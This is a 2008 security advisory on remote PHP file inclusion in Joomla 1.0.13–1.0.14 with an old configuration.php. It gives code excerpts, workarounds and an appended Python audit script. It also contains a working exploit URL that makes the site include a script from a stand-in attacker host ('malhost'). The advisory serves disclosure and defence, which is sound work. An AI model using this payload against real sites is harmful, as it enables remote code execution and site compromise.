Joomla 1.0.13 - 1.0.14 / (remote) PHP file inclusion possible if old configuration.php

2008-02-15T00:00:00
ID SECURITYVULNS:DOC:19133
Type securityvulns
Reporter Securityvulns
Modified 2008-02-15T00:00:00

Description

Affects: Joomla 1.0.13 - 1.0.14
Vulnerability: (remote) PHP file inclusion possible if old configuration.php
Date: 14-feb-2008

Introduction:

Remote PHP file inclusion is possible when RG_EMULATION is not defined in configuration.php. This is typical after upgrading from an older version while leaving configuration.php untouched. Furthermore, register_globals must be 'off' in PHP for this exploit to work.

In Joomla >= 1.0.13, configuration.php-dist disables register_globals emulation by defining RG_EMULATION as false. In older Joomla versions, this was defined in globals.php instead.

Users who upgrade without touching configuration.php (quite typical) will have RG_EMULATION unset, resulting in the following vulnerability.

In revision 7424 of globals.php, the 'configuration.php' file is included before registerGlobals() is called, allowing a malicious peer to override any value set in configuration.php.

Details:

Since revision 7424, globals.php includes 'configuration.php' if RG_EMULATION is unset, and enables RG_EMULATION by default for 'old configuration files':

    if( defined( 'RG_EMULATION' ) === false ) {
        if( file_exists( dirname(__FILE__).'/configuration.php' ) ) {
            require( dirname(__FILE__).'/configuration.php' );
        }

        if( defined( 'RG_EMULATION' ) === false ) {
            // The configuration file is old so default to on
            define( 'RG_EMULATION', 1 );
        }
    }

The registerGlobals function is called after having included 'configuration.php':

    } else if (ini_get('register_globals') == 0) {
        // php.ini has register_globals = off and emulate = on
        registerGlobals();

Maliciously set GET variables cause variables set by configuration.php to be overwritten.

Looking in index.php:

    require( 'globals.php' );
    require_once( 'configuration.php' );

Since 'configuration.php' was already included by globals.php, the require_once() won't include the configuration.php again (leaving "attacker's" values untouched!).

The exploit:

http://joomlasite/index.php?mosConfig_absolute_path=http://malhost/php_script.txt

Workaround:

In index.php and administrator/index.php change:

    require_once( 'configuration.php' );

to

    require('configuration.php');

Or disable RG_EMULATION by using the line in configuration.php-dist in configuration.php:

    if(!defined('RG_EMULATION')) { define( 'RG_EMULATION', 0 ); } // Off by default for security

Regards,

Hendrik-Jan Verheij
BWSS B.V.
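
A file-level check for the two workarounds above, as an added example that is not part of the original advisory or of Joomla: it reports a document root as exposed when configuration.php has no RG_EMULATION define and an entry point still uses require_once for configuration.php. The names `audit` and `make_sample` and the sample file contents are constructed for illustration; the PHP register_globals setting is not inspected.

```python
import re
import tempfile
from pathlib import Path

# define( 'RG_EMULATION', ... ); the trailing comma keeps defined('RG_EMULATION') from matching
RG_DEFINE = re.compile(r"define\s*\(\s*['\"]RG_EMULATION['\"]\s*,")
REQ_ONCE = re.compile(r"require_once\s*\(?\s*['\"][^'\"]*configuration\.php['\"]")
ENTRY_POINTS = ("index.php", "administrator/index.php")

def strip_comments(php):
    """Remove /* */ blocks and the rest of any line after // or # (strings are not parsed)."""
    php = re.sub(r"/\*.*?\*/", "", php, flags=re.S)
    return re.sub(r"(?m)(//|#).*$", "", php)

def read_php(path):
    return strip_comments(path.read_text(errors="replace")) if path.is_file() else ""

def audit(root):
    """Check one Joomla 1.0.x document root for the condition in this advisory."""
    root = Path(root)
    defined = bool(RG_DEFINE.search(read_php(root / "configuration.php")))
    once = [p for p in ENTRY_POINTS if REQ_ONCE.search(read_php(root / p))]
    # Exposed only when neither workaround is in place.
    return {"rg_emulation_defined": defined, "require_once_in": once,
            "exposed": not defined and bool(once)}

def make_sample(root, config_body, index_body):
    """Write a constructed, minimal site layout for the demo (not real Joomla files)."""
    root = Path(root)
    (root / "administrator").mkdir(parents=True, exist_ok=True)
    (root / "configuration.php").write_text("<?php\n" + config_body + "\n?>\n")
    for p in ENTRY_POINTS:
        (root / p).write_text("<?php\nrequire( 'globals.php' );\n" + index_body + "\n?>\n")
    return root

OLD_CONFIG = "$mosConfig_absolute_path = '/var/www/site';"  # constructed value
DIST_LINE = "if(!defined('RG_EMULATION')) { define( 'RG_EMULATION', 0 ); } // Off by default for security"

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        site = make_sample(tmp, OLD_CONFIG, "require_once( 'configuration.php' );")
        print(audit(site))  # old config, unpatched entry points
```

Point `audit()` at each Joomla 1.0.x document root after an upgrade; a commented-out define does not count as a workaround.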